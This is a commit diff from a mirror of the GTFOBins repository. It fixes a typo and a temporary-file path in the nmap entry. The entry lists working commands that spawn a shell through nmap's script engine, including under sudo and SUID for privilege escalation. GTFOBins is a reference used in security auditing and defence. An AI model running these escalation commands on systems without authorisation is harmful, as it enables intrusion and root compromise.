mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-26 06:49:44 +01:00
Fix nmap description and temporary file
This commit is contained in:
parent
f34aa31334
commit
14c8781f2d
@ -1,18 +1,21 @@
|
||||
---
|
||||
functions:
|
||||
execute-non-interactive:
|
||||
- description: Echoing of input characters3ers is disabled.
|
||||
execute-interactive:
|
||||
- description: Echoing of input characters is disabled.
|
||||
code: |
|
||||
echo 'os.execute("/bin/sh")' > /tmp/script.nse
|
||||
nmap --script=/tmp/script.nse
|
||||
TF=$(mktemp)
|
||||
echo 'os.execute("/bin/sh")' > $TF
|
||||
nmap --script=$TF
|
||||
sudo-enabled:
|
||||
- description: Echoing of input characters3ers is disabled.
|
||||
- description: Echoing of input characters is disabled.
|
||||
code: |
|
||||
echo 'os.execute("/bin/sh")' > /tmp/script.nse
|
||||
sudo nmap --script=/tmp/script.nse
|
||||
TF=$(mktemp)
|
||||
echo 'os.execute("/bin/sh")' > $TF
|
||||
sudo nmap --script=$TF
|
||||
suid-enabled:
|
||||
- description: Echoing of input characters3ers is disabled.
|
||||
- description: Echoing of input characters is disabled.
|
||||
code: |
|
||||
echo 'os.execute("/bin/sh -p")' > /tmp/script.nse
|
||||
./nmap --script=/tmp/script.nse
|
||||
TF=$(mktemp)
|
||||
echo 'os.execute("/bin/sh -p")' > $TF
|
||||
./nmap --script=$TF
|
||||
---
|
||||
|
Loading…
Reference in New Issue
Block a user